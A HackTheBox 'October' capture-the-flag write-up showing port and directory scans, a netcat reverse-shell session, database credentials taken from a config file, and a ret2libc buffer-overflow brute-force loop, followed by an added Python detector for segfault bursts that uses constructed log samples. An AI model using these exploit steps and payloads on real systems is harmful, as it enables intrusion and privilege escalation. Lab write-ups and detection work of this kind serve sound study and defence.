October — Write-up — HackTheBox

Reconnaissance

echo '10.10.10.16    october.htb' >> /etc/hosts
export IP=october.htb

nmap -vv -sV -sT -p- -O -A -oN nmap_scan.txt $IP

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBANmRR7UDp17vLPWjPYGFFxhFHygkw1gVmWZCAUO+TBY4OPnIWGRwrG+zyo39zVror9IS7wgI8rGUuwSd0Yc0xOYl>
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Txq4c0jb5/pJpdDRWMw6kGit+0TeEKq3yWPLLPifxMillxkW1P4j51ANiLUE9wQjzBticFF4Ql6l>
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWJqXjmPMM11lDdFy512ITtTx1mh4bP6jxTLmGYtSBY>
| 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA/9PENIoYUITEQDOKLYfiaUxVAgpixE8w//rH53DU7u
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1D585CCF71E2EB73F03BCF484CFC2259
| http-methods:
| Supported Methods: GET HEAD POST PUT PATCH DELETE OPTIONS
|_ Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
root@kali:/home/czar/Downloads/HTB/october# dirb http://october.htb

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: ./dirb_out.txt
URL_BASE: http://october.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Interactive Recursion

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://october.htb/ ----
+ http://october.htb/account (CODE:200|SIZE:264)
+ http://october.htb/backend (CODE:302|SIZE:400)
(Location: 'http://october.htb/backend/backend/auth')
+ http://october.htb/blog (CODE:200|SIZE:229)
+ http://october.htb/Blog (CODE:200|SIZE:229)
==> DIRECTORY: http://october.htb/config/
+ http://october.htb/error (CODE:200|SIZE:177)
+ http://october.htb/forgot-password (CODE:200|SIZE:206)
+ http://october.htb/forum (CODE:200|SIZE:383)
root@kali:/home/czar/Downloads/HTB/october# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.16] 52160
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
19:50:45 up 23 min, 0 users, load average: 10.06, 11.38, 13.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1307): Inappropriate ioctl for device
bash: no job control in this shell
www-data@october:/$ python -c "import pty;pty.spawn('/bin/bash')"

MySQL

cat /var/www/html/cms/config/database.php

--- SNIP ---
'mysql' => [
'driver' => 'mysql',
'host' => 'localhost',
'port' => '',
'database' => 'october',
'username' => 'october',
'password' => 'OctoberCMSPassword!!',
'charset' => 'utf8',
'collation' => 'utf8_unicode_ci',
'prefix' => '',
use october;
show tables;
select * from users; -- shows the users registered via the web app.
select * from backend_users; -- we get both harry's and admin's hashed credentials.

Buffer Overflow and ASLR Brute Force

while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x23\x5d\xb7" + "\x06\x52\x5c\xb7" + "\xac\x4b\x6f\xb7"'); done
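From the defender's side, a loop like the one above is noisy: every wrong guess of the libc base is a fresh process that dies with SIGSEGV, and the kernel logs each crash to kern.log with the program name, PID and fault address. The following Python detector is an added example and is not part of the original write-up; it parses kernel segfault lines and flags any program that crashes many times within a short window. The log lines, hostname, timestamps, PIDs and addresses in SAMPLE_LOG are constructed for this example, not output captured from the box, and the threshold of 10 crashes per minute is an assumed tuning value.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A syslog line carrying a kernel segfault report. The message body follows
# the format printed by the Linux x86 page-fault handler:
#   comm[pid]: segfault at ADDR ip IP sp SP error ERR [in lib[base+size]]
SEGFAULT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ kernel: \[ *[\d.]+\] "
    r"(?P<comm>\S+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>[0-9a-f]+)"
)


def _line(ts, uptime, comm, pid, addr):
    """Build one constructed kern.log line (sample data, not captured output)."""
    return (f"{ts} october kernel: [{uptime:>12.6f}] {comm}[{pid}]: "
            f"segfault at {addr} ip {addr} sp bffff2c0 error 14")


# Constructed sample: 15 crashes of one setuid binary inside three seconds
# (what a guess-the-libc-base loop leaves behind), plus benign noise.
SAMPLE_LOG = [
    _line(f"Apr 27 19:51:{2 + i // 5:02d}", 1438.1 + 0.2 * i,
          "ovrflw", 2101 + 2 * i, "b75d2310")
    for i in range(15)
] + [
    "Apr 27 19:51:03 october kernel: [ 1439.004118] firefox[1820]: segfault at 0 "
    "ip b7e3b5e6 sp bfbf9d80 error 4 in libc-2.19.so[b7e0c000+1a7000]",
    "Apr 27 19:51:05 october kernel: [ 1441.000000] usb 1-1: new high-speed "
    "USB device number 2 using ehci-pci",
]


def parse_segfaults(lines):
    """Return (timestamp, comm, pid, fault_address) for every segfault line."""
    events = []
    for line in lines:
        m = SEGFAULT_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; strptime defaults to 1900, which
        # is fine for ordering events within one log file.
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events.append((ts, m["comm"], int(m["pid"]), int(m["addr"], 16)))
    return events


def find_crash_bursts(events, threshold=10, window=timedelta(seconds=60)):
    """Flag programs that crashed at least `threshold` times within `window`.

    Returns {comm: (max_crashes_in_one_window, distinct_fault_addresses)}.
    A single program segfaulting dozens of times a minute, each time as a
    new PID, is the signature of someone retrying a fixed payload against
    a re-randomised address space.
    """
    by_comm = defaultdict(list)
    for ts, comm, _pid, addr in sorted(events):
        by_comm[comm].append((ts, addr))

    bursts = {}
    for comm, crashes in by_comm.items():
        best, start = 0, 0
        for end, (ts, _addr) in enumerate(crashes):
            # Slide the window start forward until it fits within `window`.
            while ts - crashes[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[comm] = (best, len({a for _, a in crashes}))
    return bursts


if __name__ == "__main__":
    for comm, (count, addrs) in find_crash_bursts(parse_segfaults(SAMPLE_LOG)).items():
        print(f"ALERT: {comm} crashed {count} times in one window "
              f"({addrs} distinct fault address(es))")
```

Run against a real kern.log the script would read the file line by line instead of SAMPLE_LOG; the single firefox crash stays below the threshold while the repeated ovrflw crashes are reported. Mounting the binary's directory with crash reporting enabled, or simply alerting on this pattern, gives an operator a chance to notice the brute force long before one of the guesses lands.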
